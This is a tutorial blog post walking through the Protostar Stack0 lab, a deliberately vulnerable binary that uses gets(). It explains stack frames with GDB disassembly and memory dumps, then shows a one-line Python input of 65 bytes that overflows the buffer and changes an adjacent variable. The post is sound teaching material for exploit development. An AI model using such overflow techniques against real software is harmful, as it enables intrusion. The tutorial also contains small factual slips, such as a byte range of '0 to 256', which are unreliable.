Jun 22, 2020

Protostar Stack0 walkthrough

Hello there, In this tutorial we are going to learn Linux exploit development. We use protostar Linux mashing for this purpose. Protostar was developed by exploit-exercises.com. Unfortunately, The host site is now down. Anyway, you can download the iso file from the internet. Just google it. So first Download it and use a virtual box or Vmware as the virtualization software.

Introducing to Protostar

As the first step boot protostar and log in as root. Default username/password s are "root:godmode". After log in as root use ifconfig to get the IP of the mashing.

Now you can use SSH in Linux or putty to access our victim mashing. This time you have to log in as the normal user. Default credentials are "user:user".

protostar-login-interface

There is one more thing to do before you actually start the learning process. Just change your shell to bash by entering bash. Because with bash shell you have more power than the sh shell.

Now the interesting part is beginning. All of the challenges are located inside "/opt/protostar/bin".

So use cd && ls

cd /opt/protostar/bin && ls

There are 25 levels to play which can be divided into the following main categories.

  • Stack-based buffer overflows
  • Heap-based buffer overflows
  • Format string Exploits

protostar-list-all-binaries

The easiest part to understand is stack-based exploits. Even if you are new to exploit development you can understand what's going on. The first level you want to try is stack0. It'll teach you how function calls happen?. How stack frames are built and how to over flaw data outside of allocated buffer etc.

Take a look at stack0 binary

lets see what we have to do.

./stack0

just enter a string and see what happens.

It's said to retry. :-(

[email protected]:/opt/protostar/bin$ ./stack0
hello
Try again?

We have given the source code also. But actually it doesn't help a lot. Just try to get an idea of what happening.

#include
#include
#include
int main(int argc,char **argv){

  volatile int modified;
  char buffer[64];
  modified=0;
  gets(buffer);
  if(modified!=0){
    printf("you have changed the 'modified' variable\n");
  }
  else
  {
    printf("Try again?\n");
  }
}

First, it declares two variables called 'modified' and 'buffer'. The size of the buffer is 64 bytes. After it takes a string as the input from the user and copies that to buffer space. This code doesn't any kind of bound checking before copy data into buffer space. It doesn't care if the supplied string is lager than buffer space. Buffer overflows occur in such a situation.

Did you note something special when declaring the  'modified' integer value.? why there is a volatile keyword? First, we give value zero to our 'modified' value. But in this code, it's never changed and after that, there is an if-statement for check if int variable is equal to zero or not. What a joke hear. :-). When the compiler sees this, it doesn't care about if-statement and optimize the code. That's why the 'volatile' keyword is used in the above code. It says compiler, 'Hay GCC Don't bother about the integer value. It may change when run time :-)'

Disassembling the binary

Now the time to disassemble the binary and see the inner working of it. We use GDB for this. Let me introduce you to our awesome tool GDB. It's an acronym for GNU debugger. By using a debugger we can see how things are happening inside the mashing code. In the following screenshot, you can see I have used Intel syntax for assembly.

set disassembly-flavor intel

The reason to use Intel's Assembly syntax is it's clean, user friendly, and easy to understand.

As the next step, I disassembled the main function. 

(gdb) disass  main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <[email protected]>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <[email protected]>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <[email protected]>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

There are some Hexadecimal values in the left-hand side. Those are called memory addresses. Our assembly instructions are stored at these locations. The computer memory is divided into some small parts called bytes. You know that one byte is equal to 8 bits. 1 bit can hold zero or one. So in binary 8 bits can hold 256 values. Their range is 0 to 256 in decimal. Normally we work with 4-byte words.

In CPU there are 5 main components for process instructions.

  • Data bus
  • Instruction Decoder
  • Program counter
  • Arithmetic and logic unit (ALU)
  • Registers

The program counter keeps track of what instruction should be processed this time and what's next to get executed. Actually this is happened with EIP register. EIP register always holds the memory address of the instruction. Now CPU knows the memory address of the instruction . So it takes the instruction and give whatever found on that address to the Instruction Decoder. The instruction those fetched from memory is something called op-codes. They have their own meaning. The Op-Code for pop EDI is 5f while Op-Code for inc ebp is 45. Duty of Instruction Decoder is to find out what to do from these op-codes. If it sees op-code 5f it says CPU 'pop off the stack and save the value of the ESP in EDI' . As the final step needed data come through the data bus and processed in ALU. After that processed data is saved in memory or registers. OK, I hope you understood what's going on here.

Actually instructions like push ebp / mov ebp, esp are not coming from main function. They are included by the compiler to make a stack frame for the function. Let me quickly introduce you to the term stack.

The stack is a concept used in Computer science. In programs, we have to use functions to make things easy and clear. In languages like C and python, you can see that we supply some arguments to function and functions return some data too. So how this is possible? .This is the place Stack comes to play. We use the stack to give function arguments. The stack is always beginning from high memory and grows in to low memory. We can add something to stack by using push command and remove with pop command. The ESP register always points to the top of the stack.

In the following code snipet you can see, I have created a breakpoint inside of the main function. For that, I used break *0x80483f4. You may ask me 'Why you didn't use break main?'. Well if we use break main the debugger skips function prologue and only cares about the main function's code because it knows the prologue code is coming from the compiler. Since we want to see how is stack build, we set the breakpoint like this.

(gdb) b *0x080483f4
Breakpoint 1 at 0x80483f4: file stack0/stack0.c, line 6.
(gdb) run
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, main (argc=1, argv=0xbffff864) at stack0/stack0.c:6

Next, we use the command i r to see what's inside of registers. Actually this short form of info registers.

(gdb) i r
eax            0xbffff864       -1073743772
ecx            0x9b28c042       -1691828158
edx            0x1      1
ebx            0xb7fd7ff4       -1208123404
esp            0xbffff7bc       0xbffff7bc
ebp            0xbffff838       0xbffff838
esi            0x0      0
edi            0x0      0
eip            0x80483f4        0x80483f4
eflags 0x200246 [ PF ZF IF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51

Note that EIP is pointing to an address 0x80483f4. Do you remember it? It was the address of the first instruction of the above-disassembled code.EIP contains that value because the next instruction waiting to execute is there.

we have stopped execution at the start of the code. Following is the graphical view of the stack. You can see right now there is something on the top of the stack called ret. So what's it. That is the return address and after completing our function's process CPU has to go to that address and execute whatever instruction found there. 

Saved return address in the stack

We can examine stack also in GDB. Let's see how. Command for examine memory in hexadecimal is below.

Get ready to the extraction

What if I want to examine multiple words that begin from an address? We can do it this way.

(gdb) x/30x $esp
0xbffff7bc:     0xb7eadc76      0x00000001      0xbffff864      0xbffff86c
0xbffff7cc:     0xb7fe1848      0xbffff820      0xffffffff      0xb7ffeff4
0xbffff7dc:     0x0804824b      0x00000001      0xbffff820      0xb7ff0626
0xbffff7ec:     0xb7fffab0      0xb7fe1b28      0xb7fd7ff4      0x00000000
0xbffff7fc:     0x00000000      0xbffff838      0xb17f3652      0x9b28c042
0xbffff80c:     0x00000000      0x00000000      0x00000000      0x00000001
0xbffff81c:     0x08048340      0x00000000      0xb7ff6210      0xb7eadb9b
0xbffff82c:     0xb7ffeff4      0x00000001

In the above image, you can see the return address within a green box at top of the esp. Remember that top of the stack in low memory addresses.

The next instruction is push ebp. So theoretically the value of EBP register should be copied to the top of the stack after this instruction. Let's see if this true or not?

(gdb) ni
0x080483f5      6       in stack0/stack0.c
(gdb) x/30x $esp
0xbffff7b8:     0xbffff838      0xb7eadc76      0x00000001      0xbffff864
0xbffff7c8:     0xbffff86c      0xb7fe1848      0xbffff820      0xffffffff
0xbffff7d8:     0xb7ffeff4      0x0804824b      0x00000001      0xbffff820
0xbffff7e8:     0xb7ff0626      0xb7fffab0      0xb7fe1b28      0xb7fd7ff4
0xbffff7f8:     0x00000000      0x00000000      0xbffff838      0xb17f3652
0xbffff808:     0x9b28c042      0x00000000      0x00000000      0x00000000
0xbffff818:     0x00000001      0x08048340      0x00000000      0xb7ff6210
0xbffff828:     0xb7eadb9b      0xb7ffeff4

You can see that in a blue box there is a value copied to stack and it's 0xbfff838. This is nothing but the value of EBP. :-). Another thing happens. Esp changed from 0xbffff7bc to 0xbffff7b8. Calculate the difference between them using your calculator in mind. It will be at 4. Yes, the size of a register is 4 bytes. So ESP got reduced by 4 bytes. Wait why ESP reduced while we push data to stack?. This is because the stack is growing to low memory. If something is pushed to stack ESP is reduced. If we pop off the stack ESP goes high. Anyway, right now stack looks like this.

Push ebp in protostar stack0

The next instruction to execute is mov ebp , esp. So the value of ESP should be copied to EBP. Now both ESP and ESP registers point to the top of stack like this.

Protostar stack 0 mov ebp esp

Let's see this situation in GDB.

(gdb) i r esp ebp
esp            0xbffff7b8       0xbffff7b8
ebp            0xbffff838       0xbffff838
(gdb) ni
0x080483f7      6       in stack0/stack0.c
(gdb) i r esp ebp
esp            0xbffff7b8       0xbffff7b8
ebp            0xbffff7b8       0xbffff7b8

I have used another GDB command called ni hear. It is similar to the ' next instruction'. The name says all. It simply executes the next instruction. Also in the above screenshot, you can see that ESP has never changed. We have never push or pop things to stack. So ESP stays on its current location.

Next, there is a code as and esp, 0xfffffff0. This command is used to align the stack and we don't want to care much about this. However, ESP is changed like this. (Goes to a low address)

Protostar stack0 and esp

As the next instruction, there is a sub esp, 0x60 So ESP is reduced by 96 bytes. Where is 96 coming from? 60 in Hex is  96 in decimal. This is how to allocate space for local variables in the stack.

Protostar stack0 sub esp

We can see this on GDB too.

(gdb) i r esp
esp            0xbffff7b0       0xbffff7b0
(gdb) ni
10      in stack0/stack0.c
(gdb) i r esp
esp            0xbffff750       0xbffff750

0xbffff7b0 - 0xbffff750 = 0x60 ==> 96 Bytes in decimal . 

OK. Let's see what's up to next?.

mov DWRD PTR [esp + 0x5c] , 0x0

This code gets the address pointed by esp + 0x5c and copies a zero value to it. Since 0x5c is equal to 92 in decimal zero is copied to 4 bytes ahead of saved EBP.

 

Protostar stack0 saved zero value on the stack

 

Can you imagine what this line of code actually does? In our C source code, there was an int value that equal to zero. This is that value. :-)

(gdb) x/30x $esp
0xbffff750:     0x00000000      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0xb7fd7ff4      0x08049620      0xbffff788      0x080482e8
0xbffff780:     0xb7ff1040      0x08049620      0xbffff7b8      0x08048469
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864
(gdb) x/i $eip
0x80483fd <main+9>:     mov    DWORD PTR [esp+0x5c],0x0
(gdb) ni
11      in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750:     0x00000000      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0xb7fd7ff4      0x08049620      0xbffff788      0x080482e8
0xbffff780:     0xb7ff1040      0x08049620      0xbffff7b8      0x08048469
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864

Next instruction is.

lea eax , [esp + 0x1c]

lea stands for Load Effective Address.This will load the address pointed by esp + 0x1c = esp + 28

(gdb) i r eax
eax            0xbffff864       -1073743772
(gdb) x/i $eip
0x8048405 <main+17>:    lea    eax,[esp+0x1c]
(gdb) ni
0x08048409      11      in stack0/stack0.c
(gdb) i r eax
eax            0xbffff76c       -1073744020

After that, whatever in the EAX is pushed to the stack. What both of the above instructions did together? They load an address to the stack. But why? .This is the argument for the next function. the next thing to do is call to GETS function. The argument to that function was pushed to the stack. After calling to GETS function it writes data into that memory address.

protostar stack0 bufer space

Let's see what happens when the GETS function writes input data to the buffer on the stack. Now I enter some A s as the string to function.

You can clearly see that our input is copied on the stack.

(gdb) x/30x $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0xb7fd7ff4      0x08049620      0xbffff788      0x080482e8
0xbffff780:     0xb7ff1040      0x08049620      0xbffff7b8      0x08048469
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864
(gdb) x/i $eip
0x804840c <main+24>:    call   0x804830c <[email protected]>
(gdb) ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
13      in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x08004141      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864

What if I enter more large number of As? It will overflow into our previous value (modified integer). How much data is needed to overflow into integer value? Since our buffer is 64 bytes If I enter 65 As It will get modified.

protostar stack0 overwrite buffer

Now all clear and OK. It's time for extraction. We can use the lovely <3 Python for this.

If I enter python -c "print '\x41' * 65 " in a shell I can get 65 As printed. So I can pipe this command's output as the input of stack0 program like this.

[email protected]:/opt/protostar/bin$ python -c "print '\x41'*65" | ./stack0
you have changed the 'modified' variable

Awesome. we did it. We successfully modified the value. It was not just one command. we learned all the theories.

Now there is one more thing. What if I enter a more large input?

We will get a segmentation fault. Real happiness begins with this part. We are going to learn more about this topic in future tutorials.

See you again soon. Thank you for reading.

Jun 20
Termux command list

Hi guys, In this document, we are going to talk about a mobile Linux platform. Termux is a terminal....

Aug 12
Cross Site Scripting Tutorial

Hello and welcome all. In our web application hacking tutorials now we have learned about SQLI....

Jun 19
Debugging Binaries with GDB

GDB is shipped with the GNU toolset. It is a debugging tool used in Linux environments. The term....

Replying to 's comment Cancel reply